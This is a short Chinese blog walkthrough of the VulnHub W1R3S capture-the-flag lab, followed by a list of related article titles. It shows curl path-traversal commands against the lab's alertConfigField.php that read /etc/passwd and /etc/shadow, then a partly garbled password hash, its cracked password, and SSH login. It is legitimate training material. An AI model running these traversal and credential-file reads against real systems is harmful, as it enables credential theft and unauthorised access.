2021年1月2日-VulnHub-W1R3S 滲透學習
VulnHub-W1R3S 滲透學習
靶機下載地址:https://www.vulnhub.com/entry/w1r3s-101,220/
kali地址:192.168.31.77
靶機IP地址:192.168.31.11
一、資訊收集
使用dirb 爆破目錄
curl是一個命令列工具,可用於在網路上傳輸資料。
它支援許多現成的協議,包括HTTP,HTTPS,FTP,FTPS,SFTP,IMAP,SMTP,POP3等。
在除錯網路請求時,curl是您可以找到的最佳工具之一。
curl使用 教程 https://flaviocopes.com/http-curl/
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.31.11/administrator/alerts/alertConfigField.php
然後我再次執行以下命令,使用相同的過程獲取密碼檔案。
curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.31.11/administrator/alerts/alertConfigField.php
將 w1r3s: 6 6 6xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
複製到一個 pass.txt 文字檔案中
得到w1r3s 的密碼computer
使用 ssh登入
獲得flag.txt
獲得flag.txt
這個靶機還是比較簡單的
相關文章
- 近源滲透學習
- 滲透測試學習記錄
- 記學習滲透測試之列舉
- 如何學習網站漏洞滲透測試學習網站
- 滲透測試是否需要學習LinuxLinux
- 記學習滲透測試之情報收集
- 從零開始內網滲透學習內網
- 記學習滲透測試之掃描埠
- 網站滲透測試學習有苦也有甜網站
- 記學習滲透測試之漏洞掃描一
- 記學習滲透測試之漏洞掃描二
- 記學習滲透測試之破解密碼一解密密碼
- 記學習滲透測試之破解密碼二解密密碼
- 滲透測試好學嗎?都需要學習哪些技術?
- 內網滲透-初探域滲透內網
- 學習滲透測試其實就是那麼簡單
- 記學習滲透測試之漏洞掃描簡述
- 網路安全學習要多長時間?滲透測試技術學習
- 2021年美國遊戲裝置滲透率(附原資料表) 遊戲
- 2021年美國遊戲種類滲透率(附原資料表) 遊戲
- 滲透小白如何學程式設計程式設計
- 網站漏洞滲透測試行業該如何去學習網站行業
- 記學習滲透測試之識別作業系統作業系統
- 滲透測試學習之報告測試引數五
- 【滲透測試學習平臺】webforpentester-3.XSSWeb
- DC-5靶場滲透實戰過程(個人學習)
- 2021年美國主要手機品牌滲透率(附原資料表)
- wifi滲透WiFi
- 域滲透之利用WMI來橫向滲透
- 記學習滲透測試之報告測試引數一
- 記學習滲透測試之報告測試引數二
- 記學習滲透測試之代理伺服器(保持低調)伺服器
- 記學習滲透測試之報告測試引數四
- 記學習滲透測試之報告測試引數三
- 2021年美國Z世代手機品牌滲透率(附原資料表)
- 2021年美國購物直播平臺滲透率(附原資料表)
- 2021年俄羅斯主要社交媒體滲透率(附原資料表)
- metasploit滲透測試筆記(內網滲透篇)筆記內網